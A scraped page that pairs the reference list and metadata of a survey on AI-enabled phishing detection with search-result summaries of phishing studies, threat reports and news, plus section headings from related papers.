Vrbančič, G., Fister Jr, I., & Podgorelec, V. (2018). Swarm intelligence approaches for parameter setting of deep learning neural network: Case study on phishing websites classification. In Proceedings of the 8th international conference on web intelligence, mining and semantics (pp. 1–8).

Williams, E. J., Hinds, J., & Joinson, A. N. (2018). Exploring susceptibility to phishing in the workplace. International Journal of Human-Computer Studies , 120 , 1–13.

Yao, W., Ding Y., & Li, X. (2018). Logophish: A new two-dimensional code phishing attack detection method. In 2018 IEEE international conference on parallel and distributed processing with applications, ubiquitous computing and communications, big data and cloud computing, social computing and networking, sustainable computing and communications (ISPA/IUCC/BDCloud/SocialCom/SustainCom) (pp. 231–236). IEEE.

Yasin, A., Fatima, R., Liu, L., Yasin, A., & Wang, J. (2019). Contemplating social engineering studies and attack scenarios: A review study. Security and Privacy , 2 (4), e73.

Zamir, A., Khan, H. U., Iqbal, T., Yousaf, N., Aslam, F., Anjum, A., et al. (2020). Phishing web site detection using diverse machine learning algorithms. The Electronic Library .

Download references

Author information

Authors and affiliations.

Department of Computer Science, Air University, E-9, Islamabad, Pakistan

Abdul Basit & Maham Zafar

School of Information Engineering, Yangzhou University, Yangzhou, China

Department of Cyber Security, Air University, E-9, Islamabad, Pakistan

Abdul Rehman Javed, Zunera Jalil & Kashif Kifayat

You can also search for this author in PubMed Google Scholar

Corresponding author

Correspondence to Xuan Liu .

Additional information

Publisher's note.

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Rights and permissions

Reprints and permissions

About this article

Basit, A., Zafar, M., Liu, X. et al. A comprehensive survey of AI-enabled phishing attacks detection techniques. Telecommun Syst 76 , 139–154 (2021). https://doi.org/10.1007/s11235-020-00733-2

Download citation

Accepted : 09 October 2020

Published : 23 October 2020

Issue Date : January 2021

DOI : https://doi.org/10.1007/s11235-020-00733-2

Share this article

Anyone you share the following link with will be able to read this content:

Sorry, a shareable link is not currently available for this article.

Provided by the Springer Nature SharedIt content-sharing initiative

Phishing attack
Security threats
Advanced phishing techniques
Cyberattack
Internet security
Machine learning
Deep learning
Hybrid learning
Find a journal
Publish with us
Track your research

IMAGES

Frontiers
Phishing Report 2022: Which Individuals Are Most at Risk
(PDF) A survey on phishing detection and prevention technique
(PDF) Phishing Website Detection Based on Multidimensional Features
Phishing Attacks
Phishing Attacks

COMMENTS

Phishing Attacks: A Recent Comprehensive Study and a New Anatomy
Phishing is a field of study that merges social psychology, technical systems, security subjects, and politics. Phishing attacks are more prevalent: a recent study ( Proofpoint, 2020) found that nearly 90% of organizations faced targeted phishing attacks in 2019.
Mitigation strategies against the phishing attacks: A systematic
In line with the research questions, the paper identifies and classifies existing mitigation strategies against the phishing attacks. Most of the mitigation strategies are based on machine learning algorithms as the underlying technology.
How Good Are We at Detecting a Phishing Attack? Investigating the
The paper documents a study that presented test participants with five different categories of emails (including phishing and non phishing) . The findings from the study show that participants, generally, found it difficult to detect modern phishing email attacks.
A systematic literature review on phishing website ...
Phishing is a fraud attempt in which an attacker acts as a trusted person or entity to obtain sensitive information from an internet user. In this Systematic Literature Survey (SLR), different phishing detection approaches, namely Lists Based, Visual Similarity, Heuristic, Machine Learning, and Deep Learning based techniques, are studied and ...
Phishing Attacks: A Recent Comprehensive Study and a New Anatomy
This article proposes a new detailed anatomy of phishing which involves attack phases, attacker's types, vulnerabilities, threats, targets, attack mediums, and attacking techniques.
The Scams Among Us: Who Falls Prey and Why
On April 17, 2020, Google announced that it had blocked a staggering 126 million phishing scams related to COVID-19, the disease caused by the 2019 novel coronavirus, in a single week. This was the most intense and extensive phishing attack in the company's history ( Kumaran & Lugani, 2020 ).
An effective detection approach for phishing websites using URL and
This paper provides an efficient solution for phishing detection that extracts the features from website's URL and HTML source code.
Life-long phishing attack detection using continual learning
This paper explores continual learning (CL) techniques for sustained phishing detection performance over time. To demonstrate this behavior, we collect phishing and benign samples for three ...
Human Factors in Phishing Attacks: A Systematic Literature Review
The analysis of the retrieved publications, framed along the research questions addressed in the systematic literature review, helps in understanding how human factors should be considered to defend against phishing attacks. Future research directions are also highlighted.
All About Phishing Exploring User Research through a Systematic
The central role played by the user in phishing attacks is precisely why we wish to better understand the current state of user-centered phishing research, including a wide range of methodological approaches and potentially significant attack attributes.
A comprehensive survey of AI-enabled phishing attacks detection
This paper also presents the comparison of different studies detecting the phishing attack for each AI technique and examines the qualities and shortcomings of these methodologies. Furthermore, this paper provides a comprehensive set of current challenges of phishing attacks and future research direction in this domain.
Applications of deep learning for phishing detection: a systematic
Phishing attacks aim to steal confidential information using sophisticated methods, techniques, and tools such as phishing through content injection, social engineering, online social networks, and mobile applications. To avoid and mitigate the risks of these attacks, several phishing detection approaches were developed, among which deep learning algorithms provided promising results. However ...
A Systematic Review on Deep-Learning-Based Phishing Email Detection
To develop a comprehensive understanding of the current state of research on the use of deep learning techniques for phishing detection, a systematic literature review is necessary. This review aims to identify the various deep learning techniques used for phishing detection, their effectiveness, and areas for future research.
Detecting Phishing Domains Using Machine Learning
Phishing is an online threat where an attacker impersonates an authentic and trustworthy organization to obtain sensitive information from a victim. One example of such is trolling, which has long been considered a problem. However, recent advances in phishing detection, such as machine learning-based methods, have assisted in combatting these attacks. Therefore, this paper develops and ...
Phishing Website Detection Using Machine Learning
Phishing is an internet scam in which an attacker sends out fake messages that look to come from a trusted source. A URL or file will be included in the mail, which when clicked will steal personal information or infect a computer with a virus. Traditionally, phishing attempts were carried out through wide-scale spam campaigns that targeted broad groups of people indiscriminately. The goal was ...
APWG
Phishing Activity Trends Reports The APWG Phishing Activity Trends Report analyzes phishing attacks reported to the APWG by its member companies, its Global Research Partners, through the organization's website at https://apwg.org , and by e-mail submissions to [email protected]. APWG also measures the evolution, proliferation, and propagation of crimeware by drawing from the research ...
Phishing in Organizations: Findings from a Large-Scale and Long-Term Study
Abstract—In this paper, we present findings from a large-scale and long-term phishing experiment that we conducted in collaboration with a partner company. Our experiment ran for 15 months during which time more than 14,000 study participants (employees of the company) received different simulated phishing emails in their normal working context.
A Systematic Literature Review on Phishing Email Detection Using
Every year, phishing results in losses of billions of dollars and is a major threat to the Internet economy. Phishing attacks are now most often carried out by email. To better comprehend the existing research trend of phishing email detection, several review studies have been performed. However, it is important to assess this issue from different perspectives. None of the surveys have ever ...
Phishing Detection: A Literature Survey
This article surveys the literature on the detection of phishing attacks. Phishing attacks target vulnerabilities that exist in systems due to the human factor. Many cyber attacks are spread via mechanisms that exploit weaknesses found in end-users, which makes users the weakest element in the security chain. The phishing problem is broad and no single silver-bullet solution exists to mitigate ...
A Systematic Literature Review on Phishing and Anti-Phishing Techniques
h to find out different types of phishing and anti-phishing techniques. Research study evaluated that spear phishing, Email Spoofing, Email Manipul. tion and phone phishing are the most commonly used phishing techniques. On the other hand, according to the SLR, machine learning approaches have the highest accuracy of preventing.
(PDF) Study on Phishing Attacks
Phishing is. one such type of methodologies which are used to acquire the. information. Phishing is a cyber crime in which emails, telephone, text messages, personally identifiable information ...
PDF 2023 1internet Crime Report
2023 3INTERNET CRIME REPORT INTRODUCTION Dear Reader, ... Phishing/Spoofing: The use of unsolicited email, text messages, and telephone calls purportedly from a legitimate company requesting personal, financial, and/or login credentials.
Rivers of Phish: Sophisticated Phishing Targets Russia's Perceived
A sophisticated spear phishing campaign has been targeting Western and Russian civil society. In collaboration with Access Now, and with the participation of numerous civil society organizations, we uncover this operation and link it to COLDRIVER, a group attributed by multiple governments to the Russian Federal Security Service (FSB).
Abnormal Security Announces H2 2024 Email Threat Report
SAN FRANCISCO, August 14, 2024 - Abnormal Security, the leader in AI-native human behavior security, today released its H2 2024 Email Threat Report, revealing the growing threat of file-sharing phishing attacks, whereby threat actors use popular file-hosting or e-signature solutions as a disguise to manipulate their targets into revealing private information or downloading malware.
Microsoft's AI Can Be Turned Into an Automated Phishing Machine
Attacks on Microsoft's Copilot AI allow for answers to be manipulated, data extracted, and security protections bypassed, new research shows.
Iranian backed group steps up phishing campaigns against Israel, U.S
Today Google's Threat Analysis Group (TAG) is sharing insights on APT42, an Iranian government-backed threat actor, and their targeted phishing campaigns against Israel and Israeli targets. We are also confirming recent reports around APT42's targeting of accounts associated with the U.S. presidential election. Associated with Iran's Islamic Revolutionary Guard Corps (IRGC), APT42 ...
12th August
At the time the report was published, Ivanti have yet to release a patch and Fortinet decided not to fix the custom encryption key bypass. ... Check Point Research Publications; Global Cyber Attack Reports; Threat Research; February 17, 2020 "The Turkish Rat" Evolved Adwind in a Massive Ongoing Phishing Campaign. Check Point Research ...
Five Offbeat Phishing Schemes To Know: New Twists On Classic Scams
The fundamental nature of phishing—replicating authentic communications to deceive individuals into taking action—remains unchanged.
Stealthy phishing attack uses advanced infostealer for data exfiltration
Phishing attacks featuring an advanced, stealthy technique designed to exfiltrate a wide range of sensitive information have been observed by Barracuda threat analysts.
A comprehensive survey of AI-enabled phishing attacks detection
The time lost on remediation after a phishing attack can have a damaging impact on the productivity and profitability of businesses. In the current scenario, organizations need to provide their employees with awareness and feasible solutions to detect and report phishing attacks proactively and promptly before it causes any harm.

REVIEW article

Introduction

Phishing Definitions

Real-World Phishing Examples

Developing a Phishing Campaign

Historical Overview

The Latest Statistics of Phishing Attacks

What Attributes Make Some People More Susceptible to Phishing Attacks Than Others

Proposed Phishing Anatomy

Planning Phase

Attack Preparation

Attack Conducting Phase

Valuables Acquisition Phase

Types and Techniques of Phishing Attacks

Deceptive Phishing

Phishing e-Mail

Spoofed Website

Phone Phishing (Vishing and SMishing)

Social Media Attack (Soshing, Social Media Phishing)

Technical Subterfuge

Malware-Based Phishing

Key Loggers and Screen Loggers

Viruses and Worms

Session Hijackers

Web Trojans

Hosts File Poisoning

System Reconfiguration Attack

Domain Name System Based Phishing (Pharming)

Content Injection Phishing

Man-In-The-Middle Phishing

Search Engine Phishing

URL and HTML Obfuscation Attacks

Countermeasures

Human Education (Improving User Awareness About Phishing)

Technical Solutions

Solutions Provided by Legislations as a Deterrent Control

Author Contributions

Conflict of Interest

Life-long phishing attack detection using continual learning

Similar content being viewed by others

An effective detection approach for phishing websites using URL and HTML features

Deep fake detection and classification using error-level analysis and deep learning

A holistic and proactive approach to forecasting cyber threats

Related Work

URL features based detection

Content based detection

Visual and hybrid features based detection

Research tools and methods

Embedding Techniques in ML

TL Techniques

Methodology

Data pre-processing and features extraction

Experiments and results

Experiments with VNN

Experiments with TL

Experiments with CL: learning without forgetting

Experiments with CL: elastic weight consolidation

Performance comparison of continual learning

Accuracy comparison

Confusion matrices

Discussions

Conclusion and future work

Data availability

Author information

Contributions

Corresponding author

Ethics declarations

Additional information

Rights and permissions

About this article

Share this article

Quick links

Human Factors in Phishing Attacks: A Systematic Literature Review

New Citation Alert added!

New Citation Alert!

Information & Contributors

Index Terms

Recommendations

Defending against phishing attacks: taxonomy of methods, current issues and future directions

Fighting against phishing attacks: state of the art and future challenges